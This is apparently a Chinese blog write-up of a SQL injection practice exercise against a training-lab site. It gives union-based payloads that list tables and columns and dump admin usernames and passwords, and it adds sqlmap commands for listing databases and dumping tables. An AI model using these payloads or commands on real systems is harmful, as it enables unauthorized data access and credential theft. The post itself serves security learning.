SQL注入案例

目录

一、简介

二、案例

1.发现注入点

2.寻找注入类型

3.寻找字段数

4.将传参值设为超出数据量的大值,联合查询找到回显位置

5.找到数据库

6.寻找库中的表

7.寻找表中列

8.查看表中数据

附:SQLMap注入

1.输入指令查数据库

2.输入指令查表

3.脱库查看账号密码


一、简介

记录SQL注入的案例练习

二、案例

http://pu2lh35s.ia.aqlab.cn/

1.发现注入点

2.寻找注入类型

,发现?id=1 and 1=1 符合

3.寻找字段数

发现字段数为2

4.将传参值设为超出数据量的大值,联合查询找到回显位置

5.找到数据库

6.寻找库中的表

?id=111111 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()--+

7.寻找表中列

?id=111111 union select 1,group_concat(column_name) from information_schema.columns where table_name='admin'--+

8.查看表中数据

?id=111111 union select 1,group_concat(username,':',password) from admin--+

注:用 --+ 对结尾进行注释

附:SQLMap注入(sqlmap -u "x")

1.输入指令查数据库( --dbs)

2.输入指令查表( -D xx --tables)

3.脱库查看账号密码( -D xx -T xxx -C xxxx --dump)

相关推荐
愿你天黑有灯下雨有伞33 分钟前
从数据库到播放器:Java视频续播功能完整实现解析
java·数据库·音视频
鲁子狄1 小时前
[笔记] 动态 SQL 查询技术解析:构建灵活高效的企业级数据访问层
java·spring boot·笔记·sql·mysql·mybatis
中文很快乐1 小时前
postgreSQL的sql语句
数据库·sql·postgresql
DBWYX1 小时前
Doris
数据库
Dubhehug2 小时前
8.数据库索引
数据库·mysql·索引·索引分类·索引优缺点
满分观察网友z2 小时前
告别CRUD Boy!SQL子查询:从头疼到真香的进化之路
数据库·后端
赤鸢QAQ2 小时前
Qt小组件 - 2(布局)瀑布流布局,GridLayout,FlowLayout
开发语言·数据库·qt
ZLJ0507242 小时前
网络安全的基本练习
安全·网络安全
♡喜欢做梦3 小时前
【MySQL】索引
数据库·mysql
桑晒.3 小时前
Webshell连接工具原理
安全·web安全·网络安全